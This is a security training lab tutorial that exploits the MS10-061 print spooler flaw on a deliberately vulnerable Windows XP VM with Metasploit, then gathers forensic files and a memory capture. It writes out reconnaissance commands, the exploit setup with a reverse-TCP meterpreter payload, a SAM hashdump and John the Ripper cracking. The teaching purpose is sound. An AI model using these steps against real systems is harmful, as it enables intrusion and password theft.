ComputerSecurityStudent (CSS) [Login] [Join Now]

|SECURITY TOOLS >> Metasploit >> Current Page |Views: 27690

(Metasploit: MS10-061)

{ Kali 1.0: Detect NetBIOS Printer Shares, Gain Access, and Obtain Forensic Files }

Section 0. Background Information
  1. What is the scenario?
    • Have you ever heard about how a malicious perpetrator was able to connected to a shared printer and later gain Administrator privilege to that machine?  Well, attackers can use the same technique as Stuxnet to gain privilege to Windows XP and Windows 2003 Servers that are sharing printers.  This lesson will provide you with (1) the reconnaissance to view this potential vulnerability, (2) perform the exploitation, and (3) how to collect the forensics files for a later investigation.

  2. What is Metasploit?
    • The Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine.  The Metasploit frame work has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.

  3. What is Helix?
    • Helix is a customized distribution of the Knoppix Live Linux CD. It focuses on incident response and computer forensics.  Helix is more than just a bootable live CD. With Helix you can boot into a robust Linux environment that includes (1) a customizable linux kernels, (2) excellent hardware detection and (3) many applications dedicated to Incident Response and Forensics.

  4. What is the Microsoft Print Spooler Service Impersonation Vulnerability?
    • The ms10_061_spoolss module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The
      working directory at the time is %SystemRoot%\system32. An attacker
      can specify any file name, including directory traversal or full
      paths. By sending WritePrinter requests, an attacker can fully
      control the content of the created file. In order to gain code
      execution, this module writes to a directory used by Windows
      Management Instrumentation (WMI) to deploy applications. This
      directory (Wbem\Mof) is periodically scanned and any new .mof files
      are processed automatically. This is the same technique employed by
      the Stuxnet code found in the wild.

  5. References
  6. Pre-Requisite Lab
    1. Damn Vulnerable Windows XP: Lesson 1: How to create a Damn Vulnerable Windows XP Machine
    2. Kali: Lesson 1: Installing Kali 1.0

  7. Post-Requisite Lab
    1. Volatility 2.2: Lesson 3: Analyzing the Memory Dump of a MS10-061 Attack

  8. Lab Notes
    • In this lab we will do the following:
      1. Download Helix2008R1
      2. Perform NMAP NetBios and RPC Scan
      3. Perform NetBios Share Reconnaissance
      4. Use Metasploit Module ms10_061_spoolss to connect to victim
      5. Collect Basic Forensic Files
      6. Perform Remote Forensic Memory Capture with Helix
      7. Download Basic Forensic Files

  9. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2015 No content replication of any kind is allowed without express written permission.


Section 1: Download Helix
  1. Open Firefox
    • Instructions:
      1. Click the Start Button
      2. Type firefox in the search box
      3. Click the firefox icon


  2. Start Helix Download
    • Instructions:
      1. Navigate to the following URL
      2. Select Save File radio button
      3. Click the OK button


  3. Save Helix
    • Instructions:
      1. Navigate to your desired destination directory
        • In my case, C:\CSS\ISOs
      2. File name: Helix2008R1.iso
      3. Save as type: ISO Image File (*.iso)
      4. Click the Save button


Section 2: Start Your Damn Vulnerable WXP-SP2 VM
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player


  2. Edit Virtual Machine Settings
    • Instructions
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine settings


  3. Configure CD/DVE(IDE)
    • Instructions:
      1. Select CD/DVD (IDE)
      2. Click on the Use physical drive: radio button
      3. Select Auto detect
    • Note(FYI):
      1. Do not click on the OK Button


  4. Configure Network Adapter
    • Instructions:
      1. Select Network Adapter
      2. Click the radio button "Bridged: Connected directly to the physical network"
      3. Click the OK button


  5. Start Damn Vulnerable WXP-SP2
    • Instructions
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine


Section 3: Login to Damn Vulnerable WXP-SP2
  1. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Administrator
      2. Password: Supply Password
      3. Press <Enter> or Click the Arrow


Section 4: Verify you have a Network IP Address
  1. Open the Command Prompt
    • Instructions:
      1. Click the Start Button
      2. All Programs --> Accessories --> Command Prompt


  2. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
      2. Record Your IP Address
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address
      • This is the IP Address of the Victim Machine.


Section 5: Create Shared Printer
  1. Open Control Panel (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. Click the Start Button
      2. All Programs --> Control Panel


  2. Open Printers and Faxes
    • Instructions:
      1. Double Click on Printers and Faxes


  3. Add Printer
    • Instructions:
      1. Right Click in white portion of the Printers and Faxes Screen
      2. Click Add Printer


  4. Add Printer Wizard
    • Instructions:
      1. Click the Next Button


  5. Add Printer Wizard (Local or Network Printer)
    • Instructions:
      1. Select Local printer attached to this computer
      2. Click the Next Button


  6. Add Printer Wizard (Select a Printer Port)
    • Instructions:
      1. Select Use the following port:
      2. Select LPT1: (Recommended Printer Port)
      3. Click the Next Button


  7. Add Printer Wizard (Install Printer Software)
    • Instructions:
      1. Manufacturer: Canon
      2. Printers: Select the first printer in the list
      3. Click the Next Button


  8. Add Printer Wizard (Use Existing Driver)
    • Instructions:
      1. Select Keep existing driver (recommended)
      2. Click the Next Button


  9. Add Printer Wizard (Name Your Printer)
    • Instructions:
      1. Printer name: CANON
      2. Do you want to use this printer as the default printer? Yes
      3. Click the Next Button


  10. Add Printer Wizard (Printer Sharing)
    • Instructions:
      1. Click Share name:
      2. Share name: CANON
      3. Click the Next Button


  11. Add Printer Wizard (Location and Comment)
    • Instructions:
      1. Click the Next Button


  12. Add Printer Wizard (Print Test Page)
    • Instructions:
      1. Do you want to print a test page? No
      2. Click the Next Button


  13. Add Printer Wizard (Completing the Add Printer Wizard)
    • Instructions:
      1. Click the Finish Button


Section 6: Configure Kali Virtual Machine Settings
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player


  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Kali
      2. Edit Virtual Machine Settings
    • Note:
      • Before beginning a lesson it is necessary to check the following VM settings.


  3. Configure CD/DVD
    • Instructions:
      1. Click on CD/DVD (IDE)
      2. Click on the radio button "Use physical drive:"
      3. Select Auto detect


  4. Set Network Adapter
    • Instructions:
      1. Click on Network Adapter
      2. Click on the radio button "Bridged: Connected directly to the physical network".
      3. Click the OK Button


Section 7: Play and Login to Kali
  1. Start Up Kali
    • Instructions:
      1. Click on Kali
      2. Play virtual machine


  2. Supply Username
    • Instructions:
      1. Click Other...
      2. Username: root
      3. Click the Log In Button


  3. Supply Password
    • Instructions:
      1. Password: <Provide you Kali root password>
      2. Click the Log In Button


  4. Open a Terminal Window
    • Instructions:
      1. Click on Applications
      2. Accessories --> Terminal


  5. Obtain Kali's IP Address
    • Instructions:
      1. ifconfig
      2. Record your IP Address
    • Note(FYI):
      • Command #1, ifconfig is used to display Kali's IP Address.
      • Command #2, Record Your IP Address. 
        • Mine is
        • Yours will probably be different.


Section 8: Printer Share Reconnaissance
  1. NMAP Share Search
    • Notes(FYI):
      • Replace with your Damn Vulnerable WXP-SP2 address found in (Section 4, Step 2).
    • Instructions:
      1. nmap -sS -sU -O -p137-139,445
      2. Notice that (1) netbios-ssn service is open on port 139/tcp,  (2) microsoft-ds is open on port 445/tcp, and (3) the Operating System is Windows XP.
    • Notes(FYI):
      • Command #1, Use the nmap TCP SYN Scan (-sS) and UDP Scan (-sU) to quickly scan Damn Vulnerable WXP-SP2 for the NetBios Ports 137 to 139, and 445.  Also, use the Operating Footprinting Flag (-O) to provide the OS Version of the scanned machine.
      • NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model allowing applications on separate computers to communicate over a local area network.
      • TCP port 445 is used for direct TCP/IP Microsoft Networking access without the need for a NetBIOS layer. The SMB (Server Message Block) protocol is used among other things for file sharing in Windows NT/2K/XP.
      • Gold Nuggets: The Operating System is Windows XP with NetBIOS listening on port 139 and SMB is listening on port 445.  In the following steps, we will use (nmblookup) to query TCP/139 for NetBIOS Shares.  TCP/445 will be used to launch the RPC service impersonation vulnerability against the Print Spooler Service.


  2. Lookup NetBIOS names
    • Notes(FYI):
      • Replace with your Damn Vulnerable WXP-SP2 address found in (Section 4, Step 2).
    • Instructions:
      1. nmblookup -A
    • Notes(FYI):
      • nmblookup is used to query NetBIOS names and map them to IP addresses in a network using NetBIOS over TCP/IP queries. The options allow the name queries to be directed at a particular IP broadcast area or to a particular machine.
      • Command #1, Use nmblookup to query Damn Vulnerable WXP-SP2 for its NetBIOS Workstation and Group Names.
      • Gold Nugget: Notice that WXPSP2 is your NetBIOS Workstation Name.  Now we have the final piece of reconnaissance we need (WXPSP2) in order to query for NetBIOS shares including printers.


  3. Access SMB Resources
    • Notes(FYI):
      • Replace with your Damn Vulnerable WXP-SP2 address found in (Section 4, Step 2).
    • Instructions:
      1. smbclient -L \\WXPSP2 -I -N
    • Notes(FYI):
      • Command #1, Use smbclient to access SMB resources.  In this case, use (-L) to list was services that are available on the NetBIOS Workstation named WXPSP2.  Use (-I) if your NetBIOS name does not match the TCP/IP DNS host name or if you are trying to reach a host on another network.  Use (-N) to suppress the password prompt.  This is for scripting purposes.
      • Server Message Block (SMB) operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network.
      • Gold Nugget: The NetBIOS Workstation named (WXPSP2) is sharing a printer named CANON.


Section 9: It's Metasploit Time
  1. Start msfconsole
    • Instructions:
      1. msfconsole
    • Note(FYI):
      • Command #1, The msfconsole provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the MSF.
      • Your picture will probably be different than mine. If you want to change you picture you can type banner.


  2. Use ms10_016_spoolss exploit
    • Instructions:
      1. search ms10_061
      2. use exploit/windows/smb/ms10_061_spoolss
    • Note(FYI):
      • Command #1, Search the MSF repository for the MS10-061 exploit module.
      • Command #2, Use the MS10-061 exploit module.


  3. View MS10-061 Information
    • Instructions:
      1. info
      2. View the Description
    • Note(FYI):
      • Command #1, Among the various details, the info command provides the author, description and references about the particular exploit.


  4. Set Payload
    • Instructions:
      1. set PAYLOAD windows/meterpreter/reverse_tcp
    • Note(FYI):
      • Command #1, This payload allows the attacker to connect back to the victim, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged).


  5. Show Options
    • Instructions:
      1. show options
    • Note(FYI):
      • Command #1, This command displays which settings are available and/or required for that specific module.  RHOST is required and PNAME is available for the exploit module (ms10_061_spoolss).  LHOST is required for the payload (windows/meterpreter/reverse_tcp)
    • .


    • Notes(FYI):
      • Replace with your Kali IP Address found in (Section 7, Step 5).
      • Replace with your Damn Vulnerable WXP-SP2 IP Address found in (Section 4, Step 2).
      • Replace CANON with the name of the printer you created in (Section 5, Step 9).
    • Instructions:
      1. ifconfig
      2. set LHOST
      3. set RHOST
      4. set PNAME CANON
    • Note(FYI):
      • Command #1, ifconfig is used to display the IP Address of the primary network interface of the Kali machine.
      • Command #2, LHOST is the attacking machine (Kali).
      • Command #3, RHOST is the victim machine (Damn Vulnerable WXP-SP2).
      • Command #4, PNAME is the name of the victim machine's printer.


  7. Engage Exploit
    • Instructions:
      1. exploit
      2. Notice the malicious executable gets written to C:\WINDOWS\system32.  This executable is used to connect back to port 4444 on the Kali attack machine. Record your Malicious Executable, mine is named (W75nXA97wkv3RI.exe).
      3. Notice the malicious print request that is written to C:\WINDOWS\system32\wbem\mof.  This request is use to control execution of the malicious executable above.
      4. Notice that a Meterpreter session is now created between Kali and Damn Vulnerable WXP-SP2.
    • Note(FYI):
      • Command #1, Executes the exploit.


  8. Understanding the Exploit
    • Instructions:
      1. getuid
      2. getpid
        • Record your PID, which will be used in Step #4.  Mine is 196.
      3. shell
      4. tasklist /v /fi "PID eq "196"
        • Replace (196) with your PID recorded in Step #2.
      5. netstat -nao | findstr "196"
        • Replace (196) with your PID recorded in Step #2.
    • Note(FYI):
      • Command #1, getuid will display the user that the Meterpreter server that is running on the victim machine.  Consequently, NT AUTHORITY\SYSTEM is the Administrator account.
      • Command #2, getpid provides the Process ID (PID) of the Meterpreter session that is running on victim machine.  My PID is (196).
      • Command #3, shell provides command line access to the Windows Machine.
      • Command #4, This command will display a list of applications and associated tasks/processes that are currently running on the local machine. Flag Explanation: (/v) display a verbose list of processes; (/fi) is a filter; and ("PID eq "196") filter or display only a PID that matches 196.
      • Command #5, netstat displays network connections.  Flag Explanation: (-n) Displays addresses and port numbers in numerical form; (-a) Displays all connections and listening ports; and (-o) Displays the owning process ID associated with each connection.


  9. Basic Forensic Files
    • Instructions:
      1. tasklist > forensics_tasklist.txt
      2. netstat -nao > forensics_netstat.txt
      3. dir > forensics_dir.txt
      4. exit
    • Note(FYI):
      • Command #1, Redirect the output created by tasklist into a file called forensics_tasklist.txt.
      • Command #2, Redirect the output created by netstat into a file called forensics_netstat.txt.
      • Command #3, Redirect the output created by dir into a file called forensics_dir.txt. 
      • Command #4, Exit the command shell and return to the meterpreter prompt.


  10. Obtain SAM Database
    • Instructions:
      1. hashdump
      2. Highlight and Right Click the lines display by hashdump.
      3. Select Copy.
    • Note(FYI):
      • Command #1, hashdump will display the contents of the SAM database.
      • The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista and Windows 7 that stores users' passwords.


  11. Open the GNOME Text Editor
    • Instructions:
      1. gnome-text-editor samhash.txt
    • Note(FYI):
      • Command #1, Open a file (samhash.txt) using the gnome-text-editor.


  12. Paste SAM Database Contents
    • Instructions:
      1. Edit --> Paste


  13. Save File
    • Instructions:
      1. File --> Save


  14. Close File
    • Instructions:
      1. File --> Quit
      2. Click on the Second Terminal Window


Section 10: Setup Forensic File Collection
  1. Memory Collection Preparation (On Kali)
    • Instructions:
      1. mkdir -p /forensics/ms10_061
      2. cd /forensics/ms10_061
      3. nc -l -vvv -p 8888 > ms10_061.dd
    • Note(FYI):
      • Command #1, Create a directory called /forensics/ms10_061. Use (-p) to suppress an error if the directory already exists.
      • Command #2, Change Directory into /forensics/ms10_061.
      • Command #3, Create a netcat listener (-l) on port (-p) 8888 in extreme verbose mode (-vvv) redirecting (>) output into a file (ms10_016.dd)


Section 11: Collect Victim Memory
  1. Enter Virtual Machine Settings (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. Click on Player
      2. Click on Virtual Machine Settings


  2. Configure CD/DVD Settings
    • Instructions:
      1. Click on CD/DVD(IDE)
      2. Check Connected
      3. Select Use ISO image file:
      4. Click the Browse Button
      5. Navigate to the Helix2008R1.iso
        • In my case, C:\CSS\ISOs\Helix2008R1.iso
      6. Click the OK Button


  3. Helix (Accept Risk)
    • Instructions:
      1. Click the Accept Button


  4. Helix (Live Acquisition)
    • Notes(FYI):
      • Replace with your Kali IP Address found in (Section 7, Step 5).
    • Instructions:
      1. Click on the Camera
      2. Source: \\PhysicalMemory - [521 MB]
      3. Location Options: Netcat
      4. Destination IP:
      5. Port: 8888
      6. Click the Acquire Button


  5. Helix (Start Memory Capture)
    • Instructions:
      1. Click the Yes Button
    • Notes(FYI):
      • Use dd.exe to copy the Physical Memory of the victim machine over the network to the netcat session running on Kali.


  6. Helix (Copying Physical Memory)
    • Instructions:
      1. The Black Command Window will disappear once the memory copy from the victim machine to Kali completes.


Section 12: Retrieve Victim Files
  1. Memory Copy Results (On Kali)
    • Instructions:
      1. Netcat will display the number of bits received.
      2. ls -l ms10_061.dd
      3. In the bottom tray, click on the first terminal window, which should contain your Meterpreter session.
    • Notes(FYI):
      • Command #2, You now have a binary memory capture of the victim machine, that we will analyze in a subsequent lesson.


  2. Download Forensic Files
    • Notes(FYI):
      • In substep #4, replace (W75nXA97wkv3RI.exe)with your malicious executable found in (Section 9, Step 7).
    • Instructions:
      1. pwd
      2. download C:\\WINDOWS\\system32\\forensics_tasklist.txt /forensics/ms10_061/
      3. download C:\\WINDOWS\\system32\\forensics_netstat.txt /forensics/ms10_061/
      4. download C:\\WINDOWS\\system32\\forensics_dir.txt /forensics/ms10_061/
      5. download C:\\WINDOWS\\system32\\W75nXA97wkv3RI.exe /forensics/ms10_061/
      6. In the bottom tray, click on the second terminal window, which should contain your Forensic Folder.
    • Notes(FYI):
      • Command #2-5, Download the forensics_tasklist.txt, forensics_netstat.txt, forensics_dir.txt, W75nXA97wkv3RI.exe files from the victim machine and place in the /forensics/ms10_061 destination directory on Kali.


Section 13: John The Ripper
  1. John The Ripper
    • Instructions:
      1. cp /samhash.txt .
      2. grep -i admin samhash.txt > adminhash.txt
      3. cat /dev/null > /root/.john/john.pot
      4. john --format=nt adminhash.txt
    • Notes(FYI):
      • Command #1, Copy the from the slash(/) directory to the current (.) directory.
      • Command #2, Use grep to search for the string (admin) in file (samhash.txt), while ignoring the case (-i).  Create a file named adminhash.txt, by redirecting (>) the search results of the grep command into adminhash.txt


Section 14: Proof of Lab
  1. Proof of Lab (Basic Process Forensics)
    • Instructions:
      1. ls -lrta
      2. grep "4444" *.txt
        • Record you PID, mine is 196.
      3. grep "196" forensics_tasklist.txt
        • Replace (196) with your PID.
        • Record your malicious executable, mine is W75nXA97wkv3RI.exe
      4. grep "W75nXA97wkv3RI.exe" forensics_tasklist.txt
        • Replace (W75nXA97wkv3RI.exe) with your malicious executable
      5. grep "W75nXA97wkv3RI.exe" forensics_dir.txt
        • Replace (W75nXA97wkv3RI.exe) with your malicious executable
      6. date
      7. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Note(FYI):
      • In a subsequent lesson, we will use Volatility to analyze the memory capture and in relations to your forensics_*.txt files.
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a word document
      3. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth